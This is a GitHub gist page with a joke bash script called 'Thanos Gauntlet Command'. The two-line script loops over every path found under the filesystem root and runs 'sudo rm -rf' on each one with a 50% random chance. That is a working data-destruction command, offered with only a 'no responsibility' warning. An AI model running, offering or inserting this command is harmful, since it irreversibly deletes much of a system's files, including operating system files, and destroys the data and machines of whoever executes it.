Last active
May 15, 2019 03:03
-
-
Save kneeprayer/23b0d4dc45318d2f02f8bd0a70b5bb31 to your computer and use it in GitHub Desktop.
Thanos Gauntlet Command (Warning : No responsibility)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
for i in $(find /); do [ $[ $RANDOM % 2 ] == 0 ] && sudo rm -rf $i ; done; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment